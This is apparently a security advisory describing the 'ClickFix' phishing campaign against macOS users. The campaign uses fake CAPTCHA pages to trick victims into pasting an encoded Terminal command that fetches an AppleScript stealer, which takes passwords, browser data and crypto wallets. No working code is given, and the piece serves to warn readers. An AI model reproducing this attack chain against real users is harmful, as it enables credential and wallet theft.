“ClickFix” Phishing Campaign Targets macOS Users with Terminal Commands to Steal Credentials and Crypto Wallets

How the Attack works

1. Deception: Users navigating to a compromised website (often impersonating popular trading platforms) are presented with a fake CAPTCHA or “human verification” page that mimics a legitimate Cloudflare security check.
2. OS-Specific Attack: The attacker customizes the instructions based on the victim’s operating system:

• Windows users receive innocuous (harmless) PowerShell instructions.
• macOS users are instructed to open Terminal, paste a seemingly benign, base64-encoded command, and press Enter.

3. Payload Execution: When the macOS command is run, it decodes and executes a script that fetches a highly obfuscated AppleScript payload from a remote server.
4. Data Theft and Exfiltration: The AppleScript performs the core data harvesting activities:

• It prompts the user for their password to escalate privileges.
• It scans the Desktop, Documents, and Library folders for sensitive files (e.g., .pdf, .docx, Keychain databases, and Safari artifacts).
• It enumerates and copies saved credentials, cookies, form history, and encrypted files from major browsers, including MetaMask and Exodus crypto wallet files.
• The collected data is archived into a .zip file and exfiltrated to the attacker’s command-and-control server.

5. Evasion: By relying on the victim to manually execute a one-line Terminal command rather than dropping a traditional malware binary, the “ClickFix” method effectively bypasses signature-based antivirus solutions.

This campaign, linked to the “Odyssey stealer,” underscores the need for users to be highly skeptical of any website instructing them to copy and paste code into their operating system’s command line.